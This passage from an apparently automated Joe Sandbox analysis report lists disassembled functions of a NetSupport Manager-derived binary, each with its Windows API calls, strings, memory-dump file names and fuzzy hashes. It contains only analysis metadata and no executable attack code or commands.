                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                    • API String ID: 175691280-2052047905
                                                                                    • Opcode ID: 5efc2b1b499c19e22c0b11ea56c1799b84258173eef5baac531c406e2266982d
                                                                                    • Instruction ID: 2d49a6c718824c4fb39b7936eb355b27ab8e956fb5db8f47369f869790572c39
                                                                                    • Opcode Fuzzy Hash: 5efc2b1b499c19e22c0b11ea56c1799b84258173eef5baac531c406e2266982d
                                                                                    • Instruction Fuzzy Hash: 91F0F979B0021D6BCB01DFA4DC50BFEBBFC9B45208F044099EA04A7240DE706A05C7A5
                                                                                    Function 110D1370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                    • API String ID: 175691280-2052047905
                                                                                    • Opcode ID: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                    • Instruction ID: 95fe0cd820de1796fd70713afb7a02e85a0165c228f84a05359d3cb2f5b90ec5
                                                                                    • Opcode Fuzzy Hash: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                    • Instruction Fuzzy Hash: 4FF0A47AA0025CBBCB00DEA5DD40BEEFBBD9B45248F044199E608A7140DE706A45C7A5
                                                                                    Function 1109D3F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,1109E29C,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D42D
                                                                                    Strings
                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109D3FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressErrorLastProc
                                                                                    • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
                                                                                    • API String ID: 199729137-262600717
                                                                                    • Opcode ID: 72b6cad3dfc85a2363e3c34f7b358bf502283420fca47eee65f37d335c1a72b0
                                                                                    • Instruction ID: e717ac8c1df76163528922924e3c5170e1254239c9623c731bd739b822e2347b
                                                                                    • Opcode Fuzzy Hash: 72b6cad3dfc85a2363e3c34f7b358bf502283420fca47eee65f37d335c1a72b0
                                                                                    • Instruction Fuzzy Hash: C2F05E72A55228AFD724DFA4E844A97B7E8EB48720F00451AF95597240C670FC14DBA0
                                                                                    Function 11029170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • CreateThread.KERNEL32(00000000,00000000,11026ED0,00000000,00000000,00000000), ref: 110291BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread__wcstoi64
                                                                                    • String ID: *TapiFixPeriod$Bridge
                                                                                    • API String ID: 1152747075-2058455932
                                                                                    • Opcode ID: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                    • Instruction ID: bf80e38bc05b38b2fab7e3f27e0d367de778c9bee9065702c43ca09430eaf323
                                                                                    • Opcode Fuzzy Hash: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                    • Instruction Fuzzy Hash: 60F0E57074532D7EFB11DAD6CC45F79B6989300B08FA0003DF528551C8E6B1B9008766
                                                                                    Function 11001080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 11001096
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 2046328329-2830328467
                                                                                    • Opcode ID: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                    • Instruction ID: 77f34a7b6d351dc7c2bdf78fd4e91b5ab9e9d0feae3f5383371c0572f9fc60e5
                                                                                    • Opcode Fuzzy Hash: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                    • Instruction Fuzzy Hash: 98E01ABA71025DBFD714CE95EC81EE7B3ACEB48364F008529FA2997640D6B0E85087A1
                                                                                    Function 11001040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 11001056
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 819365019-2830328467
                                                                                    • Opcode ID: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                    • Instruction ID: cf35a841ff9db8a25d072bdd62e9da3c8eef3a8b3e547f8f1cf52fd96b7d4918
                                                                                    • Opcode Fuzzy Hash: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                    • Instruction Fuzzy Hash: 3CE04FB570021DABD310CA95DC85ED7B39CEB54354F008429F92887600D6B0F89087A0
                                                                                    Function 110010D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 110010E6
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 906220102-2830328467
                                                                                    • Opcode ID: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                    • Instruction ID: e326bc5325dc434b8864e09602644acab64ba33727794dfa8c4f249b36814fc9
                                                                                    • Opcode Fuzzy Hash: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                    • Instruction Fuzzy Hash: 81E04FB970025DAFD314CA95DC45ED6B3ACEB54764F008429F92887600DA70F84087A0
                                                                                    Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 11001126
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 1604732272-2830328467
                                                                                    • Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                    • Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
                                                                                    • Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                    • Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4
                                                                                    Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KillTimer.USER32(?,?), ref: 1100102B
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 11001016
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 2229609774-2830328467
                                                                                    • Opcode ID: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                    • Instruction ID: d507351e39c60ba8400a42a64aee1b3b281c2e630578985a984e8bb8925e1fd6
                                                                                    • Opcode Fuzzy Hash: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                    • Instruction Fuzzy Hash: 21D02B76B4031DABD310C691DC44FD2F39CD714364F008035F55446500D570F8408390
                                                                                    Function 11143320 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _strncpy
                                                                                    • String ID: 1000,50$1000,50
                                                                                    • API String ID: 2961919466-2776873633
                                                                                    • Opcode ID: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                    • Instruction ID: bd0c201b9adf6a5d857793fbf3440ac1f90bcd045974f847078f01ed738f2ada
                                                                                    • Opcode Fuzzy Hash: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
